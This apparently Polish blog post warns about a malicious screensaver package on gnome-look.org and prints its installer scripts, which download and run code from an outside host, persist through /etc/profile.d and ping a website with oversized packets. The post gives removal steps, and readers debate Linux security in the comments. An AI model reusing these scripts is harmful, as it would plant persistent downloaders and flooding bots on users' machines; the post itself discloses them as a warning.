przystajnik

Przyganiał kocioł

Na Linuksa nie ma wirusów – tak odpowie niemal każdy zaznajomiony ze specyfiką tego systemu. I o ile w przypadku samorozprzestrzeniających się wirusów jest to niemal prawda, o tyle nie mówi się głośno o problemie złośliwego oprogramowania (malware), które może narobić np. bigosu z plikami użytkownika. Mit niezłomnego systemu chyli się w mroczną przepaść?

A jest wyjątkowa okoliczność by wspomnieć o tym, bowiem parę godzin temu znaleziono na stronie http://gnome-look.org dwie paczki ze złośliwym kodem. Jedna z rzeczonych paczek .deb została umieszczona w kategorii ‚wygaszacze ekranu’ (pod nazwą ‚ninja’) i każdy kto ją zainstalował nowego wygaszacza na pewno nie zobaczył. A co zobaczył? Wynik uruchomienia takiego ‚instalatora’:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit

Nie da się ukryć, że ten skrypt nie wygląda normalnie. Całość jest wykonywana przy każdym zalogowaniu przez umieszczony w /etc/profile.d/ plik gnome.sh (zawiera komendę /usr/bin/Auto.bash&). Na szczęście, całość wykonuje tylko prosty atak DDOS (?). Zawartość pliku Auto.bash:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

Skrypt run.bash wykonuje:

ping -s 65507 www.mmowned.com

Prawdopodobnie celem jest zebranie adresów IP komputerów z zainstalowanymi powyżej skryptami lub zDDOSowania mmowned.com (?).

Enigmatyczny plik index.php też nie wyjaśnia swojej roli w całym tym przedsięwzięciu – nie wklejam go, bo to zlepek skryptów.

<!-- T35 Hosting Ad Code Begin --> 
<style type="text/css"> 
#t35ad{font: 14px  arial,helvetica; text-decoration: none; line-height:1.5em; text-align: center; }
#t35ad a{font: 14px  arial,helvetica; text-decoration: none; }
#t35ad a:hover{background-color: black; color: white; font-size:medium; font-weight: bold; }
#t35ad ul{display: inline; list-style-type: none; padding: 0;}
#navlist li{display: inline; list-style-type: none; padding-right: 0px; padding-left: 0px; padding: 0;}
</style> 
<script type="text/javascript" charset="utf-8"> 
  var redvase_ad = { version: 1.5 };
  redvase_ad.publisher = 't35';
  redvase_ad.kind      = 't35_footer_prem';
  redvase_ad.content   = 'creative'
  </script> 
<script src="http://redvase.bravenet.com/javascripts/redvase.js" type="text/javascript" charset="utf-8"></script> 
<!-- T35 Hosting Ad Code End --> 
</noscript></noframes> 
<!-- T35 Hosting Ad Code Begin --> 
<!-- Start of Stat Code --> 
<img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1" height="1" alt="stats" border="0" /> 
<script type="text/javascript"> 
_qoptions={
qacct:"p-f2Rp-GHnsAESA"
};
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> 
<noscript><img src="http://pixel.quantserve.com/pixel/p-f2Rp-GHnsAESA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript> 
<!-- End of Stat Code --> 
<div id="t35ad" align="center" style="display:block;"> 
<br/>Hosted by <a target="_blank" href="http://www.t35.com/">T35 Free Web Hosting</a>.
<a target=_blank href=http://www.saharamakeup.co.uk/>Indian Bridal Makeup</a> - <a target=_blank href=http://www.hypercasinos.com/component/option,com_jreviews/Itemid,28/>Casino Reviews</a> - <a target=_blank href=http://www.www.mckennavw.com/>VW Los Angeles</a> - <a target="_blank" href="http://www.drugrehabcenter.com/">Drug Rehab</a> - <a target=_blank href=http://www.bestonlinecollegesdegrees.com/college-degrees-online.html>Online Degree</a> - <a target=_blank href=http://www.uk-cheapest.co.uk>Domains</a> - <a target=_blank href=http://www.fashiondrops.com/>Prada Shoes</a> - <a target=_blank href=http://www.thelabdesign.com/organic-seo.html>SEO Los Angeles</a> 
</div>

Jeżeli ktoś zainstalował tę paczkę, pozostaje mu wykonać operację na żywym organizmie:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Jaki morał wynika z tej historii? Ano taki, że przyganiał kocioł garnkowi. Wraz ze wzrostem uproszczeń w systemie Linux, staje się on podobnym celem dla złoczyńców, co i Windows. Czynnikiem decydującym pozostaje człowiek, który w imię wygody nie będzie zastanawiał się, po co jest potrzebne hasło administratora, ani też z jakiego źródła pochodzi paczka. Może nie będziemy świadkami takiego pogromu, jak w systemie Windows. Ale co z tego, że unikniemy rozprzestrzeniających się wirusów, jeśli jakiś drań za pomocą skryptów, które sami ochoczo zainstalujemy, usunie nam z dysku wszystkie pliki należące do nas? (każdy w miarę znający Bash’a jest w stanie to napisać).

Dlatego proponuję trzymać się sprawdzonych źródeł oprogramowania (oficjalne repozytoria lub repozytoria dodatkowe o sprawdzonej renomie, PPA).
 

Post navigation

  • Konrad

    Więcej o wirusach dla Uniksów: http://www.viruslist.pl/analysis.html?newsid=538

  • Sławek

    http://blog.linux.pl/post-5591.html#comments

    Proszę szanownego bloggera o zapoznanie się z tym 😉 .

  • pyk

    To prawda: zawsze trzeba uruchamiać rzeczy pobrane z Internetu z głową. Rozumiem takie Eclipse, ale nie wszystko, co popadnie!
    Takie coś to jeden z powodów, dla którego nie lubię nieoficjalnych repozytoriów.
    „Dlatego proponuję trzymać się sprawdzonych źródeł oprogramowania (oficjalne repozytoria lub repozytoria dodatkowe o sprawdzonej renomie, PPA).” – świetna porada.

    Do Autora bloga: na dole jest obrazek zastępczy, pochodzący z serwisu hostującego obrazki z informacją o tym, że konto stało się nieaktywne, zamiast jakiegoś ładnego – zapewne – „userbara”.

    Jako że to mój pierwszy komentarz tutaj (na 95%), chciałem pozdrowić Piszącego słowami: dobre teksty!
    „tak myślę!”

  • Sławek

    „(każdy w miarę znający Bash’a jest w stanie to napisać).”
    Nie chodzi więc o wzrost uproszczeń. Od dawna było można coś takiego przeprowadzić, a nie było to przez nikogo ukrywane. Pan specjalnie wypaczył informacje potwierdzające wyższe bezpieczeństwo Linuksa. Nad Linuksem trudniej jest przejąć kontrolę niż nad Windowsem, przez co nasze działania nie mogą zaszkodzić innym użytkownikom tego samego komputera. Na Linuksie trzeba przełamać barierę root lub wykorzystać atak socjotechniczny. Było to od dawien dawna znane, a metody na przeprowadzenie ataku podobne.

    Trzeba jednak podkreślić, iż żaden zdrowo myślący człowiek nie dopuści do przejęcia kontroli nad swoim systemem. Pod Linuksem najprościej instaluje się programy z repo, a tam jest zawarte wszystko, czego użytkownik potrzebuje. Człowiek nie poda swojego/systemowego hasła na każde zamówienie. Fakt jednak taki, że po natrafieniu na odpowiednio głupią jednostkę nie robi różnicy system, z jakiego ona korzysta.

    Autor niczego nie udowodnił/dowiódł. Jedynie potwierdził to, co było wiadomo od dawna. Denerwujący jest jednak początek, iż niby autor stara się przeczyć stereotypom(zmyślone chyba przez autora).

  • @Sławek

    Tylko przedstawione mocno, dobitnie i zakropione ironią fakty są w stanie wywrzeć wrażenie na jakimś odsetku użytkowników Linuksa, którzy tęsknią za prostotą one-clik-install, znaną z wiodących systemów. Wywarcie wrażenia jest potrzebne do uświadomienia tego, że fama niezłomnego systemu nie wystarczy, jeżeli użytkownik zacznie sam ułatwiać sprawę złośliwemu oprogramowaniu. Wbrew pozorom, to nie jest oczywiste dla każdego.

    Jak napisałem we wpisie, wirusy może nam tyle złego nie zrobią (cecha wirusa to potrzebna rozprzestrzeniania się, która dzięki architekturze Linuksa jest bardzo mocno ograniczona). Ale już malware (jak opisywana przez mnie zawartość paczki .deb) może skutecznie uprzykrzyć życie. Zresztą, nie znam statystyk z rynku Windowsa, ale przypuszczalnie to obecnie programy szpiegowskie powodują więcej problemów z systemem (odcinanie internetu, zamulanie systemu, uszkodzenia bibliotek i inne), niż wirusy. Zatem, obecnym wrogiem są programy, które gdybią na nasze dane – te przesyłane internetem, jak i zalegające na dysku. Ponieważ na Linuksa póki co wykrywalność tego typu aplikacji jest niemal zerowa, nie oznacza to, że takich programów się nie tworzy – po prostu nikt ich w Linuksie nie wyszukuje.

    Reasumując, nadal uważam, że zagrożenie istnieje – i co najlepsze, od początku uważam tak samo jak Ty, że los bezpieczeństwa systemu spoczywa w rękach użytkownika. Linux dzięki swojemu charakterowi wydatnie temu pomaga, ale nie zastąpi nutki dystansu do wszystkiego co się znajdzie w internecie i da zainstalować.

  • Sławek

    @Salvadhor : Całkowicie rozumiem. Jednak fakt, że takich programów się nie wykrywa nie świadczy, że są one popularne. Użytkownik na Linuksie sam musi taki program aktywować(i to umyślnie). Obecnie nie wystarczy jakiś załącznik pocztowy, bo takie załączniki też muszą mieć nadane prawa do wykonania(kiedyś autorzy dystrybucji przestali na to zwracać uwagę).

    Jedynie przyzwyczajenia z Windows mogą być zgubą na Linuksie. Tam użytkownik jest przyzwyczajony, iż wiele programów po prostu wymaga uprawnień superużytkownika, więc prośba o ich nadanie na Linuksie nie zdziwi takiej osoby. W dodatku mamy znacznie prostszy, lepszy, szybszy, intuicyjny i bezpieczny sposób instalacji programów, jednak niektórzy początkujący przy pierwszym zetknięciu z systemem zaczynają szukać programów w Google.

    Przy okazji(dla twojej informacji). Mechanizm One Click Install istnieje od conajmniej trzech lat w jednej z wiodących dystrybucji. Nazywa się Yast One Click Install i znajduje się w systemach ze stajni Novella.

  • Gdzie wychaczyłeś tę informację? Bo nie jest to pierwszy przypadek na gnome-look 🙂

  • Sławek

    Czy mogłbym prosić o udostępnienie mojej osobie linka do tego niby malware? Wydaje mi się, że w systemach Debiano podobnych nie ma drogi, by to normalnie zainstalować.

  • @Sławek

    Obawiam się, że zawartość (skrypty) jak i sama paczka .deb zniknęły już z sieci.

  • wizard.number.next

    Obawiam się że szanowny autor sam jest dosyć głupim użytkownikiem komputer’a (przepraszam, że urażam uczucia, ale to jest moje zdanie). Szanowny autor spędził pięć minut na próbach obalenia czegoś co nigdy nie powstało, szkoda mi go. Jeżeli szanowny pan tak dąży do obalenia czegoś co nigdy nie powstało, to chętnie mu to ułatwię – włam na komputer linux’owy jest dziecinną zabawką jeżeli wie się jak to zrobić – wystarczy kilka komend, lub drugi komputer obok i jakiekolwiek łącze seryjne (COM, USB, FireWire), lub włamać się na systemu spod innego systemu. I co jakieś dalsze rozmyślania panie mądry i wszechwiedzący?

  • @wizard.number.next

    Jedyne obalanie do którego mogę się przyznać nie nadaje się do cytowania publicznego w związku z ustawą o wychowaniu w trzeźwości (teoretyczną).

    Na przekór mojej wnioskowanej głupocie, muszę Cię zaskoczyć, albowiem sam nieraz wykorzystywałem możliwość fizycznego dostępu do komputera, by uzyskać do niego dostęp (zapomniane hasła, blokady, itp itd). Ale czy to czegoś dowodzi?

    Istotą powyższych wywodów jest chęć pokazania, że wbrew stereotypom, ‚coś’ jest możliwe. Linux przedstawiany jako twierdza, w starciu z wygodą użytkowników (instalatory ściągane z internetu i instalowane ręcznie), polegnie. Może nie tak spektakularnie jak wiodący system (vide ostatnie doniesienia o dziurach w IE i samym Windowsie). Ale biedy sobie można napytać.

    I teraz dyskusja powinna się rozwinąć w kierunku jak temu zapobiec. A nie w kierunku oceny mojego stanu umysłowego (jako krytyka zachowań społecznych).

Translate »